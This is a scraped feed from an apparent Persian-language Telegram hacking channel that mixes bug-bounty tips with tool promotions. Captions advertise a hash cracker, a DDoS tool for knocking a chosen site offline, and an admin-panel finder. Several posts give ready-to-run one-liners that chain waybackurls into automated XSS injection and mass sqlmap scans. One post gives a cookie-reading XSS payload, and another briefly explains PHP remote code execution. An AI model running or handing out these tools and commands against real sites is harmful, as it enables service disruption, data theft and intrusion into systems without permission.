Media is too big
VIEW IN TELEGRAM
👾قسمت اول👾
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11 4🤯3
(شما با استفاده ابزار بالا که در نسخه تقدیم به شما میشه میتونید هش های خودتون رو به صورت تکی یا لیست کرک کنید)
(با استفاده از این ابزار شما میتونید حمله سنگین دیداس رو روی سایت مورد نظرتون پیاده سازی کنید و سایت رو از دسترس خارج کنید)
(با استفاده از ابزار اسکن یرو شما میتونید سایت مورد نظرتون رو اسکن کنید و میتونید بجز اسکن و پیدا کردن ایپی و... میتونید پنل ادمین روهم پیدا کنید)
Please open Telegram to view this post
VIEW IN TELEGRAM
echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln
BugCod3
( ZIP )#XSS #BugBounty
Please open Telegram to view this post
VIEW IN TELEGRAM
SQLMap from Waybackurls ⚰️
#sql #sql_injection
——————
➡️ @EroHack0
🙏 Boost
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection
——————
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6🗿3🤯2 1
Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
#XSS #BugBounty
Please open Telegram to view this post
VIEW IN TELEGRAM
خیلی کوتاه یه نکته بگم که احتمالاً ۹۰ درصدتون نمیدونستید
- اگر اشتباهی به جای Shutdown دستتون خورد روی Restart و نمیخواستید منتظر بمونید تا سیستمتون ریاستارت بشه کافیه زمانی که صفحه ریاستارت اومده بود دکمه Esc رو بزنید تا ازش خارج بشید ؛)
🤯5👍3🔥2❤1
🔖Backup Files Finder
😴Github: 🔗Link
#BugBounty #BugBountyTools
🔹 Share & Support Us 🔹
✔️ @EroHack
✔️Boost
A Nuclei template that allows you to search for backup files on your target's website.
😴Github: 🔗Link
#BugBounty #BugBountyTools
🔹 Share & Support Us 🔹
✔️ @EroHack
✔️Boost
👍6🤯2
Eʀᴏ ··ʜᴀᴄᴋ··
یه حمایتمون نشه🥲❤️🫶🏻 https://yangx.top/boost/EroHack0
و تنها در خواستی که دارم از شما کسایی که پریمیوم دارن چنل رو بوست کنن، ماهم از خجالتتون در میام🫶🏻
🔥4🗿2❤1
⚠️To reach the area you want to reach, do three things:
1-Creativity
2- Risk tolerance
3-Doing
♻️Read the tweet now. Click here to see the tweet.
1-Creativity
2- Risk tolerance
3-Doing
♻️Read the tweet now. Click here to see the tweet.
👍4🔥3
🤣6🗿4👎3⚡1
👎10🗿5🤣2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8🤯2👎1🗿1
آسیب پذیری Remote Code execution و یا به اختصار RCE یک نوع آسیب پذیری ریموت میباشد .
که به نفوذ گر امکان اجرای دستور دلخواه او را میدهد ، این آسیب پذیری بر اساس یک اشکال برنامه نویسی صورت میگیرد .
در هنگام استفاده از تابع Get در PHP اگر مقدار دریافتی را به درستی تعریف نکنیم با این آسیب پذیری مواجع میشویم . این مقدار میتواند بصورت یک متغیر در برنامه ما باشد . که در صورت بروز مشکل ما میتوانیم یک مقدار بصورت دلخواه به آن وارد کنیم به
تابع set را برای دادن مقدار به متغیرها در برنامه ها و تابع get را برای گرفتن مقدار متغیر ها و نمایش آنها در برنامه ها استفاده میکنیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5💯4🔥3